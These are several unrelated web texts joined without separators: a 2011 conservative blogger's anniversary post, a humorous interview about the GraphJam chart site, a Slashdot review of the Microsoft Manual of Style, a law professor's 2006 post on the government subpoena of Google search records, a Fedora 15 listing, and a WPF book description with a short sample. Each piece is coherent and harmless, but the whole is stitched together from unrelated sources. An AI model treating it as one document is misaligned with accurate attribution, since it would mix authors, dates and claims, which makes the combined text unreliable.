HAPPY 7TH BLOGIVERSARY TO RIGHT WING NUT HOUSE
CATEGORY: Blogging
Has it really been 7 years? Nearly 3,700 posts, 4 million visitors, 5.5 million page views and a lot of emotional energy expended in that time. Numbers don’t tell the story. When I started this blog on September 23, 2004, we were in the midst of a hard-fought presidential campaign that was in doubt until well into election night. The Dan Rather Affair had just hit the blogosphere, and after reading everything I could about the matter, commenting on blog posts didn’t seem to be enough. With the encouragement of Ed Morrissey, I opened a Blogger account and began posting. Until about a year ago, I rarely missed a day.
What followed was not quite the “Rise and Fall” of a blogger — more like a journey of self-discovery. Turning inward, I found my voice. It was not a voice that many on the right wanted to listen to — a fact that I, in my towering ignorance, never expected. Nor did I help my cause much by lashing out on occasion against my detractors. But it is what it is, and that’s that. I found to my delight that there was still a market for rational, less ideological analysis, albeit a smaller and less profitable one. But with my two jobs at American Thinker and PJ Media, along with other independent articles sold to a couple of sites, I am making a better living than I ever thought possible as a writer/editor. And with a book in the works, who knows what the future will bring?
I have nothing really profound to say about the last 7 years. Blogs have changed dramatically — fewer links (sharing), many more bloggers, but still room for important voices to rise up and be heard. It is much harder to accomplish that today. And the Twitterverse and Facebook revolutions have altered the landscape even more.
A little over a year ago, I realized I was burned out and began writing less. That is going to change — as soon as I can divest myself of one of my jobs. The problem now isn’t so much that I’ve lost the desire to write but rather I have no time to do it. I am gearing up to restart this blog; a redesign, a new domain name (rickmoran.com), and much more frequent and extensive postings. In short, I am going to try and raise my profile on the right, hoping that there is a larger audience for my kind of comment and analysis than there was previously.
In previous years, I have used this occasion to thank those who have helped me along the way. I see no sense in repeating myself. You know who you are, and you know I will be eternally grateful. The number 7 has had a mystical significance throughout the history of the civilized world. All sorts of good things have been associated with the digit — except perhaps the Seven Deadly Sins, of which I am on number 5 and striving hard to finish before I flee my mortal coil and join my fellow demigods on Olympus. But I am hoping that this will indeed be a Lucky 7 year and that you — my most loyal and beloved readers — will join me in the adventure.
By: Rick Moran at 3:13 pm
One Response to “HAPPY 7TH BLOGIVERSARY TO RIGHT WING NUT HOUSE”
Happy Seventh Blogiversary to Right Wing Nut House! | All American Blogger Pinged With:
3:28 pm [...] Seventh Blogiversary to Right Wing Nut House! Welcome to All American Blogger. If you’re new here, you may want to sign up for free updates via [...]
The Cartoon Lounge
A Chat with Ben Huh of GraphJam
By Drew Dernavich
Microsoft Office is to office workers what pencil and paper are to artists: the simple tools that allow a person to visualize information. But you’ve probably seen what happens when these tools fall into the wrong hands: the garish color choices! The gratuitous 3-D effects! Not to worry, cubicle dwellers. The perfect use for this software has finally arrived, and it’s not in building income projections or sales charts. No, it’s in helping us with the stuff we really think about—like, can the effects of “Cecilia” on Simon and Garfunkel be charted on a timeline? Are the utterances in the Beatles’ “Hello Goodbye” better understood as a bar graph? This is the particular genius of GraphJam, a Web site that lets users create and upload their own information graphics from Excel templates. I recently spoke with Ben Huh, the Chief Cheezburger of the site (which is part of the I Can Has Cheezburger network and its strangely-captioned cats).
CARTOON LOUNGE: The strange brand of humor that is lolcats has become very popular online—everybody loves cats and dogs. But pie charts and bar graphs?
BEN HUH: We’ve seen funny graphs and charts before on the Interwebs and we’ve enjoyed them. In this case, it was a matter of giving them a place to shine. We don’t necessarily love or hate graphs, but they are a fun tool for stating a case.
C.L.: They are, and they reflect the trend that ideas need to be expressed in terms of data if they are to have any credibility. Have you ever seen Peter Norvig’s version of what the Gettysburg Address would have been like if Lincoln had given it as a PowerPoint presentation?
B.H.: That’s absolutely hilarious. I have not seen it, but it may have just spawned a new category of GraphJams. The inelegance of most PowerPoint presentations is just ridiculous—and must be ridiculed.
C.L.: I think you’re the person to do it. Don’t you use PowerPoint and Excel in your sales meetings?
B.H.: We only use them in explaining what makes us funny to the press…
C.L.: These graphs take advantage of all the incredible graphic tools that Excel provides. But there are hard design decisions to be made also. Which color do you think works best in conveying how many times the word “ho” is used in a song: that nuclear cyan blue or the nauseating pink?
B.H.: Those are the tough decisions we leave up to our users. Like true upper-management types, we shy away from those unimportant details. That’s what we don’t pay our submitters for. I mean, you probably don’t draw the cartoons yourself. They’re outsourced to Kizahtzmapastan, yes?
C.L.: They used to be, but because Kizahtzmapastan is in a time zone twenty-eight hours ahead of us—the cartoons were ridiculously ahead of their time. Nobody understood them. But, yeah, I think I get the concept. Speaking of the users, how long did it take for this idea to catch on, and how soon did you realize that it would be so successful?
B.H.: It took a few weeks, but it’s the kind of thing that grabs a hundred per cent of someone, but not a hundred per cent of everyone. The chart nerds (like me) get all geeked up but it’s certainly not for every nerd. Believe it or not, the idea of downloading an Excel file, making a graph, remaking it to be funny, and e-mailing it back to us isn’t the easiest way to get submissions. So we’re working on ways to make it even easier. C’mon, let’s face it, we’re all lazy. We think this will make submissions even better, by removing the burden of actually having to labor over Excel.
C.L.: The burden of Excel? Somewhere Bill Gates is crying.
B.H.: Um, yeah. In his Olympic-sized pool of money and power.
C.L.: But between GraphJam, I Can Has Cheezburger, failblog, and your other sites, you’re nearing an electronic empire of your own. How do you spend your time? Are there any plans for a GraphJam movie?
B.H.: Most of my day is spent preparing and planning…using Excel. Which makes me the perfect GraphJam audience. There’s no movie planned, but we are thinking about a book.
C.L.: I’m making a prediction that sometime soon a mainstream band will tour, and instead of using the typical psychedelic light shows or video collages, they will have a screen with Excel graphs and pie charts behind them, “explaining” the songs in true GraphJam fashion. To your knowledge, has anyone done this yet?
B.H.: Not that I know of, but that would be just awesome. The real question is, can you make music from office software? Like this?
C.L.: Wow! Talk about lemonade from lemons. You don’t happen to have any office software that can create captions, do you?
B.H.: Nope, but you can always use our Lol Builder.
C.L.: If only it were that easy… Ben, I’d like to thank you, in true geek fashion, for chatting:
B.H.: Epic.
Drew Dernavich is a cartoonist. He has been contributing to The New Yorker since 2002 and has published over two hundred and fifty cartoons.
Microsoft Manual of Style
Microsoft Press
Ben Rothke
Invaluable guide to becoming a better technical writer
A style guide or style manual is a set of standards for the writing and design of documents, either for general use or for a specific publication, organization or field. The implementation of a style guide provides uniformity in the style and formatting of a document. There are hundreds of different style guides available — from The Elements of Style by Strunk and White, to the Associated Press Stylebook and Briefing on Media Law, and many more.
Microsoft's goal in creating this style manual is to standardize, clarify and simplify the creation of content by providing the latest usage guidelines that apply across the genres of technical communications. The manual has over 1,000 items, so that each author does not have to make the same 1,000 decisions. Anyone who has read Microsoft documentation knows it has a consistent look and feel, be it a manual for Visual C#, Forefront or Excel. With that, the Microsoft Manual of Style is an invaluable guide for anyone who wants to better the documentation they write. For example, many writers incorrectly use words such as less, fewer, and under as synonymous terms. The manual notes that one should use less to refer to a mass amount, value or degree; fewer to refer to a countable measure of items; and not use under to refer to a quantity or number.
Style guides are by their very nature highly subjective, and no one is forced to accept the Microsoft style as dogma. The authors themselves (note that the book was authored by a group of senior editors and content managers at Microsoft, not a single individual) note that they don't presume to say that the Microsoft way is the only way to write. Rather, it is the guidance that they follow, and they are sharing it in the hope that the decisions they have made for their content professionals will help others promote consistency, clarity and accuracy. With that, they certainly have achieved that goal.
The book is made up of two parts, with part 1 comprising 11 chapters on general topics. Chapter 1 is about Microsoft style and voice and has basic suggestions around consistency, precision, sentence structure and more. The chapter also has interesting suggestions on writing bias-free text. It notes that writers should do their best to eliminate bias and to depict diverse individuals from all walks of life in their documentation. It suggests avoiding terms that may show bias with regard to gender, race, culture, ability, age and more. Some examples are to avoid terms such as chairman, salesman and manpower, and to use instead moderator, sales representative or workforce. The manual also notes that writers should attempt not to stereotype people with disabilities with negative connotations. It suggests that documentation should positively portray people with disabilities, and it emphasizes that documentation should not equate people with their disability and should use terms that refer to physical disabilities as nouns, rather than adjectives.
The book takes on a global focus and notes that since Microsoft sells its products and services worldwide, content must be suitable for a worldwide audience. For those writing for a global audience, those sections of the manual should be duly considered. The manual also cautions authors to avoid too many technical terms and too much jargon. The danger of inappropriate use of technical terms is that people who don't think of themselves as computer professionals consider technical terms to be a major stumbling block to understanding.
The manual suggests, whenever possible, using common English words to get the point across, rather than technical ones. The book provides thousands of suggestions on how to write better documentation, including:
do not use hand signs in documentation — nearly every hand sign is offensive somewhere
do not refer to seasons unless you have no other choice – since summer in the northern hemisphere is winter in the southern hemisphere
spell out names of months – as 3/11/2012 can refer to March 11, 2012 in some places and November 3, 2012 in others
use titles, not honorifics, such as Mr. or Ms. – not all cultures have an equivalent to some honorifics that are common in the United States, such as Ms.
Chapter 6 is on procedures and technical content, and explains that consistent formatting of procedures and other technical content helps users find important information quickly and effectively. In the section on security, the style guide notes not to make statements that convey the impression or promise of absolute security. Instead, the writer should focus on technologies or features that help achieve security, and it suggests being careful when using words such as safe, private, secure, protect, and their synonyms or derivatives. It is best to use qualifiers such as helps or can help with these words.
As noted earlier, the style guide is simply a guide, not an absolute. In the book Eats, Shoots & Leaves: The Zero Tolerance Approach to Punctuation, author Lynne Truss writes of terms that are grammatically incorrect but so embedded in the language that they are what she terms a lost cause. With that, the style guide consistently uses the term all right, as opposed to alright. According to dictionary.com, although alright is a common spelling in written dialogue and in other types of informal writing, all right is used in more formal, edited writing. My own preference is that alright is clearer and ultimately more concise, and I found Microsoft's preference for all right to be distracting.
Differences aside, part 1 provides vital assistance to any writer who is interested in writing effective content that educates the reader in the clearest manner possible. The book is the collective experience of thousands of writers and their myriad sets of documentation, and it provides page after page of unique information.
Part 2 is a usage dictionary that is a literal A-Z of technical terms, common words and phrases. The goal of the usage dictionary is to give the reader a predictable experience with the content and to ensure that different writers use the same terms in a standard way. Some interesting suggestions in the usage dictionary are:
access rights – an obsolete term; use user rights
collaborator – do not use collaborator to describe a worker in a collaborative environment unless you have no other choice, as it is a sensitive term in some countries; specifically, being a collaborator in a third-world country can get one killed
email – do not use as a verb; use send instead
master / slave – do not use; the terminology, although standard in the IT industry, may be insulting to some users, and the manual notes that its use is prohibited in a US municipality
press – differentiate between the terms press, type, enter, and use, and use press, not depress, hit or strike, when pressing a key on the keyboard
Some of the terms suggested are certainly Microsoft-centric, such as:
blue screen – they suggest not to use blue screen, either as a noun or a verb, to refer to an operating system failure; use stop or stop error instead
IE – never abbreviate Internet Explorer; always use the full name
Say what you will about Microsoft, but any technical writer who is serious about being a better writer can learn a lot from the writers at Microsoft. Microsoft is serious and passionate about documentation, and it is manifest in this style guide. Microsoft has been criticized for their somewhat lukewarm embrace of open source. With the Microsoft Manual of Style, Microsoft is nearly freely sharing a huge amount of their intellectual capital. At $29 for the paperback and $10 for the Kindle edition, the manual has a windfall of valuable information at a bargain-basement of a price.
This guide is a comprehensive manual for the serious writer of technical documentation, be it a high school student or a veteran author. In fact, to describe the guide as comprehensive may be an understatement, as it details nearly every facet of technical writing, including arcane verb uses. Many authors simply write in an ad-hoc manner. This manual shows that effective writing is a discipline. The more disciplined the writer, the more consistent and better their output. Anyone who wants to be a better writer will undoubtedly find the Microsoft Manual of Style an exceptionally valuable resource.
Ben Rothke is the author of Computer Security: 20 Things Every Employee Should Know.
You can purchase Microsoft Manual of Style from amazon.com. Slashdot welcomes readers' book reviews -- to see your own review here, read the book review guidelines, then visit the submission page.
Embracing open source?!
"Microsoft has been criticized for their somewhat lukewarm embrace of open source. With the Microsoft Manual of Style, Microsoft is nearly freely sharing a huge amount of their intellectual capital. At $29 for the paperback and $10 for the Kindle edition, the manual has a windfall of valuable information at a bargain-basement of a price. "Is this Microsoft astroturfing or is the author really that clueless about what free means?1. I can't modify and redistribute. So it's not free-as-in-rights2. It's $29, so it's not free as in beerIn what way is this guide supposed to be upholding OSS values?
Microsoft's Style ...
by sk999 (846068) writes: on Monday March 19, 2012 @05:06PM (#39407797)
I always find Microsoft's documentation to be characterized consistently by two properties:
1. Tons of GUI screen shots. 20 pages of dead trees or dead electrons to convey a single paragraph's worth of actual information.
2. There is no universe outside of Microsoft. They can't acknowledge it even when they try. Example - Microsoft Exchange is notorious for violating the IMAP standard for RFC-822 message size. Microsoft's documentation actually acknowledges that Exchange does something different, but calls it a "clarification" of the standard. Right.
Re:what's in a name?
by MtHuurne (602934) writes: on Monday March 19, 2012 @06:15PM (#39408489)
There is a lot of bad documentation out there, so Microsoft's is probably above average, but I wouldn't call it good. At least the .Net documentation is a huge collection of example code fragments but contains very little text that actually explains what the methods do. Especially important details like how the method reacts when the input is invalid, the state is invalid, the operation fails, etc. are often missing. Or some hint about the underlying implementation, so you can get a feeling for which methods have to do a lot of work and which will return quickly. You can't learn those things from a code example; they have to be documented explicitly.
Google & Search Engines / Privacy / Privacy (Consumer Privacy)
Do No Evil and Perhaps Do Some Good: Google, Privacy, and Business Records
by Daniel Solove · January 20, 2006
I just blogged about the case where the government is seeking search query records from Google. I am very pleased that Google is opposing the government’s subpoena. According to the AP article:
Google — whose motto when it went public in 2004 was “do no evil” — contends that submitting to the subpoena would represent a betrayal to its users, even if all personal information is stripped from the search terms sought by the government.
“Google’s acceding to the request would suggest that it is willing to reveal information about those who use its services. This is not a perception that Google can accept,” company attorney Ashok Ramani wrote in a letter included in the government’s filing.
In contrast to Google, other search engine companies such as Yahoo complied with the subpoenas without putting up a fight. Google is to be applauded for taking the effort to rebuff the government’s request.
The government is increasingly interested in gathering personal information maintained by various businesses. As I wrote in my book, The Digital Person:
While life in the Information Age has brought us a dizzying amount of information, it has also placed a profound amount of information in the hands of numerous entities. . . . [T]hese digital dossiers are increasingly becoming digital biographies, a horde of aggregated bits of information combined to reveal a portrait of who we are based upon what we buy, the organizations we belong to, how we navigate the Internet, and which shows and videos we watch. This information is not held by trusted friends or family members, but by large bureaucracies that we do not know very well or sometimes do not even know at all.
I also wrote about the issue in an article available at SSRN.
One enormous problem is that the Supreme Court has established an immensely troubling doctrine in Fourth Amendment law known as the “third party doctrine.” In United States v. Miller, 425 U.S. 435 (1976), the Supreme Court held that people lack a reasonable expectation in their bank records because “[a]ll of the documents obtained, including financial statements and deposit slips, contain only information voluntarily conveyed to the banks and exposed to their employees in the ordinary course of business.” Employing analogous reasoning, in Smith v. Maryland, 442 U.S. 735 (1979), the Supreme Court held that people lack a reasonable expectation of privacy in pen register information (the phone numbers they dial) because people “know that they must convey numerical information to the phone company,” and therefore they cannot “harbor any general expectation that the numbers they dial will remain secret.” When there’s no reasonable expectation of privacy, the Fourth Amendment provides no protection.
The problem with the third party doctrine is that in the Information Age, countless companies maintain detailed records of people’s personal information: Internet Service Providers, merchants, bookstores, phone companies, cable companies, and many more. The third party doctrine thus severely limits Fourth Amendment protection as more of our personal information winds up in the hands of businesses.
In my book and article discussed above, I also explain that in the void left by the Fourth Amendment, Congress has passed a series of statutes that provide some regulation on government access to records of personal information maintained by businesses. The problem is that these statutes are woefully inadequate. As I wrote:
[T]here are gaping holes in the statutory regime of protection, with classes of records not protected at all. Such records include those of merchants, both online and offline. Records held by bookstores, department stores, restaurants, clubs, gyms, employers, and other companies are not protected. Additionally, all the personal information amassed in profiles by database companies is not covered.
Further, the statutes often do not provide for significant-enough standards for the government to access data. In other words, it is still very easy for the government to obtain the data even with the statutes.
I believe that this state of affairs presents problems not just for individual privacy, but for the businesses maintaining personal information as well. The government may gather personal information from businesses notwithstanding their privacy policies. This thwarts the interests of companies that want to encourage people to reveal information by promising strong limitations in its use. It adds an often unstated risk to a consumer’s revealing information to a company. It erodes people’s trust in companies as well.
A while back, I blogged about why businesses should lobby Congress for greater protections against government access to business records involving personal information:
I also think that businesses should use their power to push for greater legislative protections of personal information from government access. It is here were Google’s interests and the privacy interests of its users coincide. Right now, the government is inadequately regulated when it comes to accessing personal data maintained by third parties. If the businesses maintaining the data lobbied Congress for greater protections, this would help to address one of the major privacy threats that their maintaining the information poses. It wouldn’t solve all of the problems, but it would address a big one.
I urge Google and other businesses that gather personal information to push for legislation to better regulate government information gathering from businesses. I applaud the fact that Google is fighting the government’s subpoenas, but I urge them (and others) to go further. It is here where business interests and individual consumer interests are aligned with regard to privacy.
1. Solove, Government vs. Google
2. Solove, Google’s Empire, Privacy, and Government Access to Personal Data
The right to life, liberty, and a favorable ranking
On Nondisclosure Agreements and Societal Harm
George Bush’s Virgin Brides
Michael Bains says: January 20, 2006 at 11:42 am I’ve never been an absolutist. In this kind of situation, I would say that the only way Google could be compelled to deliver any such information, would be if the government had shown, to a relevant justice’s satisfaction, that a case might likely hinge upon the delivery of certain, very specific, information from Google’s databases.
It would have to be very specific though.
Adam says: January 20, 2006 at 11:54 am Great post! I’m curious: why not work to overturn Miller, now that we see how pernicious it turns out to be?
Peter T Davis's Small Business Blog says: January 20, 2006 at 12:58 pm Bush Wants to Violate my Fourth Ammendment Rights? And Yours too!
“The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particul…
BTD_Venkat says: January 20, 2006 at 1:02 pm Doesn’t a privacy policy alter the expectation of privacy analysis?
I’m no fan of governmental efforts to seek information from third parties, but my understanding in this case was that the government is not seeking any personal information (IP addresses, etc.). Arguably a certain amount of personal information may show up as search terms but not much (are you really going to google your own SS#).
For this reason I think google chiefly opposed the request on trade secret / unduly burdensome grounds.
BTD_Venkat says: January 20, 2006 at 1:06 pm Ah, I see you addressed some of this in your previous post. As to the chilling effects, you are right on. The bookstore cases (Tattered Cover, Kramerbooks, see generally this article) provide a good analogy.
Mike says: January 20, 2006 at 1:36 pm Google will defy the US Government, but cooperate WILLINGLY to help the Chinese Government prevent searches for “freedom” and “democracy”. Can anyone explain this?
“Google and Yahoo both censor some results on Chinese versions of their products, and the MSN blog tool in China prevents phrases like “Dalai Lama” and “human rights” from being used in the title for an entry.”
http://www.iht.com/bin/print_ipub.php?file=/articles/2006/01/15/business/chinet.php
Dave! says: January 20, 2006 at 2:25 pm Just curious, what about a reasonable expectation of privacy when a company (such as Google) makes a promise not to release your personal information to anyone? To the lay person, I think that definitely establishes an expectation of privacy, but is there any caselaw to that effect?
Daniel J. Solove says: January 20, 2006 at 2:58 pm Dave — One would think, rationally, that a promise not to release your personal information to third parties would give rise to an expectation of privacy. But don’t expect such rationality from the Supreme Court. Banks for years have been operating under implicit and explicit promises to keep customer information private. Yet, in United States v. Miller, the Court completely ignored the longstanding tradition of banks providing privacy to their customers.
Fedora Core 15 x86_64 DVD
Platform: x86_64
The Fedora Project is an openly-developed project designed by Red Hat, open for general participation, led by a meritocracy, following a set of project objectives. The goal of The Fedora Project is to work with the Linux community to build a complete, general purpose operating system exclusively from open source software. Development will be done in a public forum. The project will produce time-based releases of Fedora about 2-3 times a year, with a public release schedule. The Red Hat engineering team will continue to participate in building Fedora and will invite and encourage more outside participation than in past releases.
Fedora 15, a new version of one of the leading and most widely used Linux distributions on the market, has been released. Some of the many new features include support for Btrfs file system, Indic typing booster, redesigned SELinux troubleshooter, better power management, LibreOffice productivity suite, and, of course, the brand-new GNOME 3 desktop: "GNOME 3 is the next generation of GNOME with a brand new user interface. It provides a completely new and modern desktop that has been designed for today's users and technologies. Fedora 15 is the first major distribution to include GNOME 3 by default. GNOME 3 is being developed with extensive upstream participation from Red Hat developers and Fedora volunteers, and GNOME 3 is tightly integrated in Fedora 15."
1 DVD for installation on an x86_64 platform
Essential Windows Presentation Foundation (WPF)
“Chris Anderson was one of the chief architects of the next-generation GUI stack, the Windows Presentation Framework (WPF), which is the subject of this book. Chris’s insights shine a light from the internals of WPF to those standing at the entrance, guiding you through the concepts that form the foundation of his creation.” –From the foreword by Chris Sells
“As one of the architects behind WPF, Chris Anderson skillfully explains not only the ‘how,’ but also the ‘why.’ This book is an excellent resource for anyone wanting to understand the design principles and best practices of WPF.” –Anders Hejlsberg, technical fellow, Microsoft Corporation
“If WPF stands as the user interface technology for the next generation of Windows, then Chris Anderson stands as the Charles Petzold for the next generation of Windows user interface developers.” –Ted Neward, founding editor, TheServerSide.NET
“This is an excellent book that does a really great job of introducing you to WPF, and explaining how to unlock the tremendous potential it provides.” –Scott Guthrie, general manager, Developer Division, Microsoft
“WPF is a whole new animal when it comes to creating UI applications, drawing on design principles originating from both Windows Forms and the Web. Chris does a great job of not only explaining how to use the new features and capabilities of WPF (with associated code and XAML based syntax), but also explains why things work the way they do. As one of the architects of WPF, Chris gives great insight into the plumbing and design principles of WPF, as well as the mechanics of writing code using it. This is truly essential if you plan to be a serious WPF developer.” –Brian Noyes, chief architect, IDesign Inc.; Microsoft Regional Director; Microsoft MVP
“I was given the opportunity to take a look at Chris Anderson’s book and found it to be an exceedingly valuable resource, one I can comfortably recommend to others. I can only speak for myself, but when faced with a new technology I like to have an understanding of how it relates to and works in relation to the technology it is supplanting. Chris starts his book by tying the WPF directly into the world of Windows 32-bit UI in C++. Chris demonstrates both a keen understanding of the underlying logic that drives the WPF and how it works and also a skill in helping the reader build on their own knowledge through examples that mimic how you would build your cutting edge applications.” –Bill Sheldon, principal engineer, InterKnowlogy
Windows Presentation Foundation (WPF) replaces Microsoft’s diverse presentation technologies with a unified, state-of-the-art platform for building rich applications. WPF combines the best of Windows and the Web; fully integrates user interfaces, documents, and media; and leverages the full power of XML-based declarative programming. In Essential Windows Presentation Foundation, former WPF architect Chris Anderson systematically introduces this breakthrough platform, focusing on the concepts and techniques working developers need in order to build robust applications for real users.
Drawing on his unique experience as an architect on the team, Anderson thoroughly illuminates the crucial new concepts underlying WPF and reveals how its APIs work together to offer developers unprecedented value. Through working sample code, you’ll discover how WPF draws on the Web’s simple models for markup and deployment, common frame for applications, and rich server connectivity, and on Windows’ rich client model, simple programming model, strong control over look-and-feel, and rich networking. Topics explored in depth include:
WPF components and architecture
Key WPF design decisions–and why they matter
XAML markup language
Controls
Layouts
Visuals and media, including 2D, 3D, video, and animation
Data integration
Actions
Styles
WPF Base Services
Essential Windows Presentation Foundation is the definitive, authoritative, code-centric WPF reference: everything Windows developers need to create a whole new generation of rich, graphical applications.
Contents: Figures; Foreword by Don Box; Foreword by Chris Sells; Preface; About the Author; Chapter 1: Introduction; Chapter 2: Applications; Chapter 3: Controls; Chapter 4: Layout; Chapter 5: Visuals; Chapter 6: Data; Chapter 7: Actions; Chapter 8: Styles; Appendix: Base Services; Index
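As a taste of the declarative model the book covers, here is a minimal, illustrative XAML/C# pair in the spirit of the book's examples; it is a sketch, not an excerpt from the book, and the HelloWpf names are hypothetical:

    <Window x:Class="HelloWpf.MainWindow"
            xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
            xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
            Title="Hello, WPF" Width="300" Height="200">
        <!-- The interface is declared in markup; behavior lives in code-behind. -->
        <Button Content="Click Me" Click="OnClick" />
    </Window>

    // Code-behind for the hypothetical HelloWpf.MainWindow declared above.
    using System.Windows;

    namespace HelloWpf
    {
        public partial class MainWindow : Window
        {
            public MainWindow() { InitializeComponent(); }

            private void OnClick(object sender, RoutedEventArgs e)
            {
                MessageBox.Show("Hello from WPF!");
            }
        }
    }

The markup describes what the UI is, while the handler describes what it does; that separation underlies the designer/developer workflow the book returns to throughout.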
Microsoft .NET Development Series
General & Miscellaneous Software
Read an Excerpt
Over the past nine years I have worked on many user interface (UI) projects at Microsoft. I have spent time working on Visual Basic 6.0, the version of Windows Foundation Classes that shipped with Visual J++ 6.0, Windows Forms for the .NET Framework, internal projects that never saw the light of day, and now, finally, Windows Presentation Foundation (WPF).
I started working on WPF about 18 months after the team was created, joining as an architect in the fall of 2002. At that time, and until late 2005, the team and technology were code-named Avalon. Early in 2003 I had the privilege of helping to redesign the platform, which we released as a technology preview for the Professional Developers Conference (PDC) 2003 in Los Angeles. WPF is the product of almost five years of work by more than 300 people. Some of the design ideas in WPF date back to products from as early as 1997 (Application Foundation Classes for Java was the beginning of some of the ideas for creating components in WPF).
When I joined the WPF team, it was still very much in research mode. The project contained many more ideas than could possibly ship in a single version. The primary goal of WPF—to replace all the existing infrastructure for building applications on the client with a new integrated platform that would combine the best of Win32 and the Web—was amazingly ambitious and blurred the lines between user interface, documents, and media. Over the years we have made painful cuts, added great features, and listened to a ton of feedback from customers, but we never lost sight of that vision.
A Brief History of GUI
Graphical user interfaces (GUIs) started in the early 1980s in the Xerox PARC laboratory. Since then, Microsoft, Apple, and many other companies have created many platforms for producing GUI applications. Microsoft's GUI platform began with Windows 1.0 but didn't gain widespread use until Windows 3.0 was released in 1990. The primary programming model for building GUI applications consisted of the two dynamic link libraries (DLLs): User and GDI. In 1991 Microsoft released Visual Basic 1.0, which was built on top of User and GDI, and offered a much simpler programming model.
Visual Basic's UI model, internally called Ruby (1), was far simpler to use than were the raw Windows APIs. This simplicity angered the developers who felt that programming should be difficult. The early versions of Visual Basic were significantly limited, however, so most developers building "real" applications chose to program directly to User and GDI. Over time, that changed. By the time the Microsoft world moved to 32-bit with the release of Windows 95 and Visual Basic 4.0, the VB crowd was gaining significant momentum and was offering a much wider breadth of platform features.
At about the same time there was another big shift in the market: the Internet. Microsoft had been working on a replacement for the Visual Basic UI model that was internally called Forms3. For various reasons, Microsoft decided to use this model as the basis for an offering in the browser space. The engine was renamed Trident internally, and today it ships in Windows as MSHTML.dll. Trident evolved over the years to be an HTML-specific engine with great text layout, markup, and scripting support.
Also around the same time, another phenomenon appeared on everyone's radar: managed code. Visual Basic had been running in a managed environment for a long time (as had many other languages), but the introduction of Java by Sun Microsystems in 1994 marked the first time that many developers were exposed to the notion of a virtual machine. Over the next several years managed code became a larger and larger force in the market, and in 2002 Microsoft released its own general-purpose managed-code platform: the .NET Framework. Included in the .NET Framework was Windows Forms, a managed-code API for programming User32 and GDI+ (a successor to GDI32). Windows Forms was intended to replace the old Ruby forms package in Visual Basic.
As we entered the new millennium, Microsoft had four predominant UI platforms: User32/GDI32, Ruby, Trident, and Windows Forms. These technologies solve different sets of problems, have different programming models, and are used by different sets of customers. Graphics systems had also evolved: In 1995, Microsoft introduced DirectX, a graphics system that gave the programmer much deeper access to the hardware. But none of the four main UI technologies used this newfound power in a meaningful way.
There was a real problem to be solved here. Customers were demanding the richness of modern video games and television productions in their applications. Media, animation, and rich graphics should be everywhere. They wanted rich text support because almost every application displayed some type of text or documentation. They wanted rich widgets for creating applications, buttons, trees, lists, and text editors—all of which were needed to build the most basic application.
With these four major platforms a large percentage of the customers' needs were met, but they were all islands. The ability to mix and match parts of the platforms was difficult and error-prone. From a purely selfish point of view, Microsoft management (well, I'll name names: Bill Gates) was tired of paying four teams to build largely overlapping technologies.
In 2001, Microsoft formed a new team with a simple-sounding mission: to build a unified presentation platform that could eventually replace User32/GDI32, Ruby, Trident, and Windows Forms, while enabling the new scenarios that customers were demanding in the presentation space. The people who made up this team came largely from the existing presentation platform teams, and the goal was to produce a best-of-breed platform that could really be a quantum leap forward.
And so the Avalon team was formed. At PDC 2003, Microsoft announced Avalon (the code name at the time). Later the project was given the name Windows Presentation Foundation.
Principles of WPF
WPF has taken a long time to build, but for the entire life of this project, several guiding principles have remained constant.
Build a Platform for Rich Presentation
In descriptions of new technology, rich is probably one of the most overused words. However, I can't think of a better term to convey the principle behind WPF. Our goal was to create a superset of features from all existing presentation technologies—from basic things like vector graphics, gradients, and bitmap effects, to more advanced things like 3D, animation, media, and typography. The other key part of the principle was the word platform. The goal was to create not merely a runtime player for rich content, but rather an application platform that people could use to build large-scale applications and even extend the platform to do new things that we never envisioned.
Build a Programmable Platform
Early on, the WPF team decided that both a markup (declarative) and code (imperative) programming model were needed for the platform. As we looked around at the time, it became clear that developers were embracing the new managed-code environments. Quickly, the principle of a programmable platform became a principle of a managed programming model. The goal was to make managed code the native programming model of the system, not a tacked-on layer.
Build a Declarative Platform
From the perspective of both customers and software developers, it seemed clear that the industry was moving to a more and more declarative programming model. We knew that for WPF to be successful, we needed a rich, consistent, and complete markup-based programming model. Again, a look at what was going on in the industry made it clear that
Integrate UI, Documents, and Media
Probably the biggest problem facing customers who were building applications was the separation of pieces of functionality into isolated islands. There was one platform for building user interfaces, another for building a document, and a host of platforms for building media, depending on what the medium was (3D, 2D, video, animation, etc.). Before embarking on building a new presentation system, we set a hard-and-fast goal: The integration of UI, documents, and media would be the top priority for the entire team.
Incorporate the Best of the Web, and the Best of Windows
The goal here was to take the best features from the last 20 years of Windows development and the best features from the last 10 years of Web development and create a new platform. The Web offers a great simple markup model, deployment model, common frame for applications, and rich server connectivity. Windows offers a rich client model, simple programming model, control over the look and feel of an application, and rich networking services. The challenge was to blur the line between Web applications and Windows applications.
Integrate Developers and Designers
As applications become graphically richer and cater more to user experience, an entirely new community must be integrated into the development process. Media companies (print, online, television, etc.) have long known that a variety of designer roles need to be filled to create a great experience for customers, and now we are seeing that same requirement for software applications. Historically the tools that designers used were completely disconnected from the software construction process: Designers used tools like Adobe Photoshop or Adobe Illustrator to create rich designs, only to have developers balk when they tried to implement them. Creating a unified system that could natively support the features that designers required, and using a markup format (XAML) that would allow for seamless interoperability between tools, were two of the outcomes of this principle.
About This Book
Many books on WPF are, and will be, available. When I first thought of writing a book, I wanted to make sure that mine would offer something unique. This book is designed for application developers; it is intended as a conceptual reference book covering most of WPF. I chose each word in the preceding statement carefully.
This book is about applications. There are really two types of software: software designed to communicate with people, and software designed to communicate with software. I use the term application to mean software written primarily for communication with people. Fundamentally, WPF is all about communication with people.
This is a book for developers. I wanted to present a very code-centric view of the platform. I'm a developer first and foremost, and in working as an architect on the WPF team I have always considered the external developer as my number one customer. This book focuses on topics primarily for the application developer. Although a control developer will also find a lot of useful information in this book, its purpose is not to present a guide for building custom controls.
This book is about concepts, not just APIs. If you want an API reference, use Google or MSN search features and browse the MSDN documentation. I want to raise the abstraction and present the hows and whys of the platform design and show how the various APIs of the platform work together to add value to developers.
This book is a reference; it is organized by technical topics so that you can flip back to a section later or flip forward to a section to answer a question. You do not need to read the book from cover to cover to gain value from it.
